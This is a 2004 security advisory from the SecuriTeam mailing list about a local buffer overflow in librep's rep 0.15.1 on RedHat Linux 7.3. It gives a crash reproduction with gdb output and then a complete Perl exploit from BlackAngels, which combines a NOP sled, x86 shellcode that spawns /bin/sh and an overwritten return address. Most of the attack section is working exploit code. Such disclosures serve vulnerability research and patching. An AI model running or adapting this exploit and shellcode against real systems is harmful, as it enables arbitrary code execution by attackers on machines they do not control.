[UNIX] Local Buffer Overflow in REP (Long ARG)

2004-03-24T00:00:00
ID SECURITYVULNS:DOC:5959
Type securityvulns
Reporter Securityvulns
Modified 2004-03-24T00:00:00

Description

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source. http://www.securiteam.com/mailinglist.html


Local Buffer Overflow in REP (Long ARG)

SUMMARY

rep stands for "Read, Eval, Print", the three main components of any Lisp system. Librep is a dialect of Lisp, designed to be used both as an extension language for applications, and for use as a general programming language. A vulnerability in rep allows a local user to execute arbitrary code.

DETAILS

Vulnerable Systems: * RedHat Linux 7.3 kernel version 2.4.20, prior versions might also be effected * rep version 0.15.1

To exploit the vulnerability, simply input as first ARG a buffer string of 4081 bytes: $ declare -x BADBUFFER=`perl -e '{print "A"x"4081"}'` $ rep $BADBUFFER Segmentation fault $ gdb rep (gdb) r $BADBUFFER Program received signal SIGSEGV, Segmentation fault. 0x4003f3cd in Fexpand_file_name () from /usr/lib/librep.so.9 (gdb) info reg esp esp 0xbf414139 0xbf414139

Exploit Code:

!/usr/bin/perl -w

RedHat Linux 7.3 local Buffer Overflow in REP 0.15.1 exploit

Legal notes :

The BlackAngels staff refuse all responsibilities for an incorrect

or illegal use of this code or for eventual damages to others systems.

For more information:

[ http://www.blackangels.it ] - ( staff[at]blackangels.it )

$len = 4260; $ret = 0xbf414139; $nop = "\x90";

print "\nRedHat Linux 7.3 local Buffer Overflow in REP 0.15.1 exploit"; print "\nVulnerable versions: RedHat Linux 7.3 with 2.4.20"; print "\n============================================================\n";

if (!$ARGV[0]) { print "You must specify an offset [ Default = -1000 ] ...\n\n"; exit(-1); }

my $offset = "$ARGV[0]";

$shellcode = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89". "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c". "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff". "\xff\xff/bin/sh";

print "Trying to execute /bin/sh ...\n";

for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) { $buffer .= $nop; }

$buffer .= $shellcode;

print("\nAddress: 0x", sprintf('%lx',($ret + $offset)), "\n"); print "\tRet: $ret + Offset: $offset\n\n";

$new_ret = pack('l', ($ret + $offset)); for ($i += length($shellcode); $i < $len; $i += 4) { $buffer .= $new_ret; }

exec("/usr/bin/rep $buffer");

ADDITIONAL INFORMATION

The information has been provided by <mailto:staff@blackangels.it> BlackAngels Staff.

========================================

This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================

DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.